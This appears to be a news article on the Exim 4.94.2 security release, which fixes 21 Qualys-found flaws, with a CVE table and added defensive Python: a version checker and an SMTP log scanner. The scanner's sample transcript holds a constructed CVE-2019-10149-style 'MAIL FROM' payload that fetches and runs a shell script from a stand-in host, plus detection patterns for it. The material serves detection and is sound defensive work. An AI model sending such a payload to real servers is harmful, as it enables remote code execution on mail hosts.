Security researchers found 21 flaws in this widely used email server, so update immediately

The maintainers of the widely used Exim email server are urging admins to update to Exim version 4.94.2 because of 21 newly disclosed security flaws.

“All versions of Exim prior to version 4.94.2 are now obsolete. The last 3.x release was 3.36. It is obsolete and should not be used,” the University of Cambridge-backed project said in an update.

“This is a security release,” the project adds, referring to fixes for 21 flaws: ten can be exploited by an unauthenticated attacker over the internet, and the remaining eleven require a local account on the server.
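One way to check a host against that threshold, as an added example rather than anything from the Exim project or the article: the script below parses the first line of `exim -bV` output and compares the version with 4.94.2. The sample `-bV` output is constructed, and the binary name is an assumption (Debian installs it as `exim4`). One caveat a practitioner needs: distributions such as Debian backport the fixes to older version numbers, and the `#N` after the version is Exim's build number, not a patch level, so on distro-packaged Exim the package changelog, not the version string, is the authority on whether these CVEs are fixed.

```python
import re
import subprocess

# Exim 4.94.2 is the first upstream release carrying the fixes.
FIXED_VERSION = (4, 94, 2)

# Constructed sample of `exim -bV` output on an unpatched host (not a real
# capture). The "#2" is Exim's build number, not a third version component.
SAMPLE_BV_OUTPUT = (
    "Exim version 4.94 #2 built 08-Jun-2020 06:46:51\n"
    "Copyright (c) University of Cambridge, 1995 - 2018\n"
)

# Matches the first line of -bV output; the patch component is optional.
VERSION_RE = re.compile(r"^Exim version (\d+)\.(\d+)(?:\.(\d+))?", re.M)


def parse_exim_version(bv_output):
    """Return (major, minor, patch) from `exim -bV` output; patch defaults to 0.

    Deliberately ignores the "#N" build number that follows the version.
    """
    m = VERSION_RE.search(bv_output)
    if m is None:
        raise ValueError("no 'Exim version' line found in -bV output")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def needs_upgrade(version):
    """True if the version predates 4.94.2 (this covers every 3.x release)."""
    return tuple(version) < FIXED_VERSION


def check_local_exim(exim_path="exim"):
    """Run `exim -bV` on this host and return (version, needs_upgrade).

    The binary name is an assumption: Debian and derivatives install it as
    exim4, so pass exim_path="exim4" there.
    """
    out = subprocess.run(
        [exim_path, "-bV"], capture_output=True, text=True, check=True
    ).stdout
    version = parse_exim_version(out)
    return version, needs_upgrade(version)


if __name__ == "__main__":
    v = parse_exim_version(SAMPLE_BV_OUTPUT)
    print("sample host: Exim %d.%d.%d, needs upgrade: %s" % (v + (needs_upgrade(v),)))
```

Run it against real output with `check_local_exim("exim4")` on Debian-family hosts. Treat a "needs upgrade" result as a prompt to verify, not a verdict: a Debian 10 host patched via `4.92-8+deb10u6` still prints `Exim version 4.92`, and only `apt changelog exim4` will show the CVE identifiers.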


The new Exim release addresses security flaws reported by researchers at the security firm Qualys.

The bugs are a potentially major threat to internet security given that almost 60% of the internet's mail servers run the Exim mail transfer agent (MTA), making it by far the most widely used email server. As Qualys points out, the IoT search engine Shodan returns 3.8 million results for Exim servers exposed on the internet, of which two million are located in the US.

Exim is so widely deployed in part because it often ships as the default email server with popular Linux distributions such as Debian.

“Exim Mail Servers are used so widely and handle such a large volume of the internet’s traffic that they are often a key target for hackers,” said Bharat Jogi, a senior manager of the vulnerability and threat research unit at Qualys.

“The 21 vulnerabilities we found are critical as attackers can remotely exploit them to gain full root privileges on an Exim system – allowing compromises such as a remote attacker gaining full root privileges on the target server and executing commands to install programs, modify data, create new accounts, and change sensitive settings on the mail servers.”

Jogi urged admins — many of whom run Exim servers at ISPs, government agencies, and universities — to apply the patches “immediately” given the breadth of the attack surface these vulnerabilities expose.

Such flaws have been exploited quickly in the past: a previous remote code execution flaw in Exim, patched in mid-2019, was also found by researchers at Qualys.

The NSA eventually revealed that attackers had been exploiting that flaw, tracked as CVE-2019-10149, within two months of its public disclosure.

The NSA warned in June 2020 that a hacking group known as Sandworm, part of Russia's GRU military intelligence service, had been exploiting the Exim flaw since at least August 2019. That bug's impact, full root on the mail server, is the same as that of the 21 newly disclosed vulnerabilities.

The NSA said the attackers exploited the bug on victims’ public-facing MTAs by sending a specially crafted command in the “MAIL FROM” field of an SMTP (Simple Mail Transfer Protocol) message. Victims would then automatically download and execute a shell script from a domain controlled by the Sandworm group.
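A detection check for that pattern, added here as an example and not taken from the NSA advisory, Qualys, or the Exim project: the script scans an SMTP session transcript and flags `MAIL FROM` / `RCPT TO` commands whose envelope address contains Exim string-expansion syntax. The assumption, consistent with public analyses of CVE-2019-10149, is that the crafted command was an Exim `${run{...}}` expansion embedded in the envelope address; the session lines, the scanner hostname and the `203.0.113.5` download host are all constructed (documentation address range, not a real command-and-control server).

```python
import re

# Constructed SMTP transcript, not a real capture. The first MAIL FROM line
# mimics the shape of a CVE-2019-10149 probe: an Exim string expansion in the
# envelope sender that an unpatched server would evaluate, fetching and
# running a script. 203.0.113.5 is a documentation address.
CONSTRUCTED_SESSION = [
    "EHLO scanner.example",
    "MAIL FROM:<${run{/bin/sh -c 'wget -O- http://203.0.113.5/s.sh | sh'}}@example.com>",
    "RCPT TO:<postmaster@victim.example>",
    "DATA",
    "MAIL FROM:<alice@example.org>",
    "RCPT TO:<bob@victim.example>",
]

# Envelope commands: MAIL FROM:<addr> / RCPT TO:<addr>, angle brackets optional.
ENVELOPE_RE = re.compile(r"^(?P<cmd>MAIL FROM|RCPT TO):\s*<?(?P<addr>[^>\r\n]*)>?", re.I)

# Exim expansion syntax that has no business in an envelope address:
# ${run{...}} specifically, any ${...} expansion, and \xNN escapes that
# Exim decodes inside expansions (used to smuggle slashes and spaces).
INDICATORS = {
    "expansion_run": re.compile(r"\$\{run\{", re.I),
    "expansion_any": re.compile(r"\$\{"),
    "hex_escape": re.compile(r"\\x[0-9a-f]{2}", re.I),
}


def classify_envelope_command(line):
    """Return (cmd, addr, [indicator names]) for a MAIL FROM / RCPT TO line,
    or None if the line is some other SMTP command."""
    m = ENVELOPE_RE.match(line)
    if m is None:
        return None
    addr = m.group("addr")
    hits = [name for name, rx in INDICATORS.items() if rx.search(addr)]
    return (m.group("cmd").upper(), addr, hits)


def suspicious_envelope_commands(lines):
    """Scan a session (one SMTP command per line) and return every envelope
    command whose address carries expansion syntax."""
    findings = []
    for line in lines:
        parsed = classify_envelope_command(line)
        if parsed and parsed[2]:
            findings.append(parsed)
    return findings


if __name__ == "__main__":
    for cmd, addr, hits in suspicious_envelope_commands(CONSTRUCTED_SESSION):
        print(f"{cmd} flagged ({', '.join(hits)}): {addr}")
```

Feed it lines from a packet capture or from an SMTP proxy in front of the MTA. `$`, `{` and `}` are technically permitted in an RFC 5321 local part, so this is a heuristic rather than a protocol violation, but a `${` sequence in an envelope address is effectively never legitimate and is worth an alert on its own; a `${run{` hit is worth an incident.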


MTAs are an attractive target for attackers because they are typically exposed on the internet.

Qualys has posted a blog detailing each of the 21 bugs and says its researchers have developed exploits to obtain full root privileges.

The company reported an initial set of bugs to the Exim maintainers on 20 October 2020 and supplied 26 patches to Exim.

The full list of the 21 vulnerabilities as catalogued by Qualys follows. “Local” bugs require an account on the server; “Remote” bugs are reachable over the network by an SMTP client.

CVE             Description                                              Type
CVE-2020-28007  Link attack in Exim's log directory                      Local
CVE-2020-28008  Assorted attacks in Exim's spool directory               Local
CVE-2020-28014  Arbitrary file creation and clobbering                   Local
CVE-2021-27216  Arbitrary file deletion                                  Local
CVE-2020-28011  Heap buffer overflow in queue_run()                      Local
CVE-2020-28010  Heap out-of-bounds write in main()                       Local
CVE-2020-28013  Heap buffer overflow in parse_fix_phrase()               Local
CVE-2020-28016  Heap out-of-bounds write in parse_fix_phrase()           Local
CVE-2020-28015  New-line injection into spool header file (local)        Local
CVE-2020-28012  Missing close-on-exec flag for privileged pipe           Local
CVE-2020-28009  Integer overflow in get_stdinput()                       Local
CVE-2020-28017  Integer overflow in receive_add_recipient()              Remote
CVE-2020-28020  Integer overflow in receive_msg()                        Remote
CVE-2020-28023  Out-of-bounds read in smtp_setup_msg()                   Remote
CVE-2020-28021  New-line injection into spool header file (remote)       Remote
CVE-2020-28022  Heap out-of-bounds read and write in extract_option()    Remote
CVE-2020-28026  Line truncation and injection in spool_read_header()     Remote
CVE-2020-28019  Failure to reset function pointer after BDAT error       Remote
CVE-2020-28024  Heap buffer underflow in smtp_ungetc()                   Remote
CVE-2020-28018  Use-after-free in tls-openssl.c                          Remote
CVE-2020-28025  Heap out-of-bounds read in pdkim_finish_bodyhash()       Remote
